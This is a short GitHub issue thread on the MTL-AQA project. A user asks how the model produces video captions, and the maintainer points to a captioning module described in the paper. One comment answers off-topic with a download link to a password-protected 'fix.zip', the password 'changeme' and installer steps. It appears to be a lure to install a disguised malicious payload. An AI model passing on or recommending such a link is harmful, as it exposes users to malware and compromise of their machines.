### ISSUE TITLE
Video Content Description

### ISSUE THREAD

**Issue by sizhongzhang1** [ParitoshParmar/MTL-AQA#4]
Hello, your work is very fascinating. May I ask what method you use to generate subtitles? Where can I find the subtitles tab

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by sizhongzhang1** [comment]
Thank you! May I ask how the model you designed converts video features into textual descriptions

**Comment by ParitoshParmar** [comment]
Hi @sizhongzhang1 : thank you very much for your interest! We do so with the help of shared backbone + captioning module. More details in the paper!
